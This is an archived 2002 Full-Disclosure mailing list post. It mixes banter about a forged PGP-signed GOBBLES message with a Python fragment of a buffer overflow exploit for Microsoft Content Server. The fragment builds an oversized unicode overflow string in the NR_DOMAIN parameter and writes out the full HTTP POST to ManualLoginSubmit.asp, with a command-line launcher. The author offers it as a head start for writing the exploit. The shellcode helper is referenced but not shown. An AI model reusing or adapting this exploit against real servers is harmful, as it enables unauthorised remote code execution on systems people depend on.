| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: dave at immunitysec.com (Dave Aitel)
Subject: ALERT! ALERT! Confessions of a turkey
ALERT! ALERT! ;p;p;p;p;p;p;p
At least you got the key id correct that time. It's not a valid
signature, but at least it produces one less error message.
-dave
ObExploit:
#fragment of my exploit for MS Content Server
#the full exploit can be found at https://immunitysec.com/members/
#but if you're not a member, this might save you some time writing your
#exploit.
#returns the sploitstring
def makesploit(self):
header=""
body=""
body+="NR_DOMAIN=WinNT%3A%2F%2F"
#1 alignment byte so we are word aligned with the return addr
attack=""
attack+="A"
attack+="\x41\xb9"*4000
#unicode shellcode!!
attack=stroverwrite(attack,unicodeloop,1)
print "length of overflow = "+str(len(attack))
attack=urllib.quote(attack)
#print attack
body+=attack
body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASSWORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuestLogin.asp"
header+="POST /NR/System/Access/ManualLoginSubmit.asp
HTTP/1.1\r\n"
header+="Host: "+self.host+"\r\n"
header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows
NT; Bob)\r\n"
header+="Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\r\n"
header+="Connection: keep-alive\r\n"
header+="Content-Type: application/x-www-form-urlencoded\r\n"
header+="Content-Length: "+str(len(body))+"\r\n"
header+="\r\n"
return header+body
#this stuff happens.
if __name__ == '__main__':
print "Running Microsoft Content Server exploit v 0.1"
app = mscsexploit()
if len(sys.argv) < 2:
print "Usage: mycontent.py target [port] [ssl=0]"
sys.exit()
app.setHost(sys.argv[1])
if len(sys.argv) > 2:
app.setPort(int(sys.argv[2]))
if len(sys.argv) > 3:
app.setSSL(1)
app.run()
On Wed, 2002-08-14 at 17:00, gobbles@...h.com wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> or if you like
>
> On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave@...unitysec.com> wrote:
> >On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:
> >> Gobbles,
> >>
> >> On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles@...h.com wrote:
> >> > GOBBLES just want to be cool whitehat like everyone else. Time for new
> > leaf time for six figure salary stock option naked breasted assistant.
> >>
> >> Word to that my man! ;)
> >>
> >> peace,
> >> core
> >
> >Your message was signed, but the "GOBBLES" message was not and therefore
> >just a forgery, most likely.
> >
> >BTW:
> >http://www.immunitysec.com/vulnerabilities/
> >They arn't advisories, but if you need something to show to your boss
> >about why you disconnected your Exchange/SQL server from the Internet,
> >it's a good start.
> >
> >Dave Aitel
> >Immunity, Inc
> >
> >
>
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
>
> wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
> nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
> =xfu0
> -----END PGP SIGNATURE-----
>
>
> Communicate in total privacy.
> Get your free encrypted email at https://www.hushmail.com/?l=2
>
> Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
>
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 232 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020814/6e0905ae/attachment.bin
Powered by blists - more mailing lists